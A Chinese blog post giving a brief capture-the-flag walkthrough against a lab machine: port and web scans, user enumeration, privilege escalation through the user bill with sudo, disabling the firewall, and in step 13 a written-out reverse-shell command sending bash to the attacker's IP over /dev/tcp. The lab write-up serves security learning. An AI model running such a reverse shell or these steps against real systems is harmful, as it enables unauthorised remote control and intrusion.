CTF--HTTP服务--命令执行
2024-09-06 17:41:12
开门见山
1. 扫描靶机ip,发现PCS 172.18.5.1
2. 用nmap扫描靶机开放服务和服务版本
3. 再扫描靶机全部信息
4. 用nikto工具扫描http服务的敏感信息
5. 打开浏览器查看发现的网页
6. 查看临时缓冲目录
7. 查看home目录,挖掘用户信息
8. 查看具体用户的目录
9. 查看靶机的信息
10. 利用ssh命令,执行root权限命令
11. 用bill执行root权限关闭防火墙
12. 攻击机启动监听
13. 靶机反弹shell,使用命令:ssh bill@localhost sudo bash -i >& /dev/tcp/172.18.5.251/4444 0>& 1
14. 攻击机终端收到反馈shell
15. 还有一种shell反弹
16. 在 /root目录下查找flag文件并查看
最新文章
- linux命令 - alias
- iOS开发小技巧--UIButton的另一种布局方法(第一种在layoutSubViews方法中,这一种利用苹果提供的两个返回CGRect的方法)
- LCLFramework框架之Plugin模式
- 英语语法最终珍藏版笔记-17名词性-主语-宾语-同位语-表语-that从句
- 使用webdav实现文档共享
- java的动态绑定与双分派(规避instanceof)
- 只获取linux ip的命令
- 《实验数据的结构化程序设计》 2.4.4Calendar个人意见,寻求指引
- 递归添加 另一个ds 里的DataRow 时 报错:该行已经属于另一个表。
- Iterator 的hasNext方法和next方法
- FTP 安装配置
- LAMP基础
- Go 学习
- [R] t.test()
- Javascript权威指南阅读笔记--第3章类型、值和变量(1)
- shell脚本监控cpu/内存使用率 转
- PHP:第三章——PHP中的递归函数
- CSS3小黄人
- 七牛云整合Ueditor的ThinkPHP版本
- Go语言特点
热门文章
- python内置模块(python标准库)
- Centos 7.5安装 Mysql5.7.24
- 雪花算法 Snowflake &; Sonyflake
- 洛谷$P2150\ [NOI2015]$寿司晚宴 $dp$
- TemplateMethodPattern(模板方法模式)-----Java/.Net
- 聊聊Python中的描述符
- GPL协议中国第一案尘埃落定,相关开源软件应如何风控?
- Codeforces Round #612 (Div. 2) 前四题题解
- Prometheus基础应用
- 高德API对接